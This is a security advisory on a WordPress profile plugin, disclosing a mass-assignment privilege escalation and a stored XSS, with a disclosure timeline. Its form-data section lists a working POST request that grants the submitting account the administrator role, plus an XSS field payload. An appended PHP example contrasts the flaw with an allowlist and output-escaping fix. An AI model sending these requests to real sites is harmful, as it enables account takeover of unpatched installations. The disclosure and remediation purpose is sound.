The front-end profile form handler does not restrict which keys it writes to user meta. A logged-in user can therefore modify the POST request to overwrite user meta such as 'wp_capabilities' and 'wp_user_level', which results in a privilege escalation vulnerability (the request below grants the submitting account the administrator role). The nonce and referer fields that accompany the form are those the plugin itself emits for the current user, so they do not prevent the attack: a nonce proves the form was rendered for this user, not which fields the user is allowed to change.

User input is neither sanitised on input nor escaped on output, resulting in a stored XSS vulnerability in the field values shown below.

Timeline:
2016-09-12: Vulnerability found
2016-09-12: Reported to vendor
2016-09-12: Vendor responded
2016-09-14: Vendor released a fixed version (0.2.2)
2016-09-14: Public disclosure
Privilege Escalation - Form data (the nonce and referer values are those emitted by the form for the current session and will differ per installation):

profile[user_email]:[email protected]
profile[wp_capabilities][administrator]:1
profile[wp_user_level]:10
profile[user_url]:
profile[description]:
profile[wpfep_save]:Update Profile
wpfep_nonce_name:99fc626e77
_wp_http_referer:/sample-page/

Stored XSS - Form data (the field value is shown as it appears in the original report):

wpmark_tab[testing_field]:example">
wpmark_tab[wpfep_save]:Update Testing
wpfep_nonce_name:02c01469d8
_wp_http_referer:/sample-page/
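The following is an added example, not code from the plugin or from the original advisory. It shows the mass-assignment pattern the advisory describes (every posted key under profile[] is written to user meta) next to a hardened handler that only accepts an allowlist of editable fields, and it escapes the stored value before rendering it back into an input attribute. The form data is the advisory's own, constructed here as PHP arrays; the WordPress calls the plugin would use (update_user_meta, sanitize_text_field, esc_attr) are replaced by plain-PHP stand-ins so the file runs from the command line, and the exact shape of the plugin's original handler is an assumption.

```php
<?php
// Added example (not the plugin's code). Plain PHP stand-ins replace the
// WordPress API so this runs with `php example.php`.

// Constructed input: the privilege-escalation form data from the advisory,
// as PHP would present $_POST['profile'].
$profile_post = [
    'user_email'      => 'attacker@example.com',   // assumed address
    'wp_capabilities' => ['administrator' => '1'],
    'wp_user_level'   => '10',
    'user_url'        => '',
    'description'     => '',
    'wpfep_save'      => 'Update Profile',
];

// Constructed input: the stored-XSS form data, as $_POST['wpmark_tab'].
$tab_post = [
    'testing_field' => 'example">',
    'wpfep_save'    => 'Update Testing',
];

/**
 * Assumed vulnerable pattern: every submitted key is stored as user meta.
 * $meta stands in for the usermeta rows of the current user; in the plugin
 * this loop would call update_user_meta($user_id, $key, $value).
 */
function save_fields_vulnerable(array $posted, array &$meta): void
{
    foreach ($posted as $key => $value) {
        if ($key === 'wpfep_save') {
            continue;                  // the submit button, not a field
        }
        $meta[$key] = $value;          // wp_capabilities lands here unchecked
    }
}

/** Stand-in for sanitize_text_field(): drop tags and control characters. */
function sanitize_text(string $value): string
{
    return trim(preg_replace('/[\x00-\x1f\x7f]/', '', strip_tags($value)));
}

/**
 * Hardened handler: only keys in $allowed are written; wp_capabilities and
 * wp_user_level are never in the allowlist, so they cannot be reached from
 * the form. Returns the keys that were rejected so a caller can log them.
 */
function save_fields_hardened(array $posted, array $allowed, array &$meta): array
{
    $rejected = [];
    foreach ($posted as $key => $value) {
        if ($key === 'wpfep_save') {
            continue;
        }
        if (!in_array($key, $allowed, true) || !is_string($value)) {
            $rejected[] = $key;        // silently ignored: not user-editable
            continue;
        }
        $meta[$key] = sanitize_text($value);
    }
    return $rejected;
}

/** Stand-in for esc_attr(): escape a value before it goes into an attribute. */
function esc_attr_like(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Render a stored value back into the form without breaking out of the attribute. */
function render_field(string $name, string $value): string
{
    return sprintf('<input type="text" name="%s" value="%s">',
        esc_attr_like($name), esc_attr_like($value));
}

// Vulnerable path: the administrator capability is written to meta.
$vuln_meta = [];
save_fields_vulnerable($profile_post, $vuln_meta);
echo "vulnerable meta: " . json_encode($vuln_meta) . PHP_EOL;

// Hardened path: the privileged keys are rejected, ordinary fields kept.
$safe_meta = [];
$dropped = save_fields_hardened($profile_post, ['user_email', 'user_url', 'description'], $safe_meta);
echo "hardened meta:   " . json_encode($safe_meta) . PHP_EOL;
echo "rejected keys:   " . implode(', ', $dropped) . PHP_EOL;

// XSS path: the tab field is stored, then rendered with attribute escaping
// so the quote in the payload cannot close the value="..." attribute.
$tab_meta = [];
save_fields_hardened($tab_post, ['testing_field'], $tab_meta);
echo render_field('wpmark_tab[testing_field]', $tab_meta['testing_field']) . PHP_EOL;
```

The allowlist is the fix for the privilege escalation: whichever fields the form legitimately edits, the role and level keys must be absent from it, and a denylist of the two names in the advisory would not be enough because other meta keys (anything a theme or plugin trusts) are equally reachable through the same loop. Escaping at output is what stops the stored XSS even when an older, unsanitised value is already in the database.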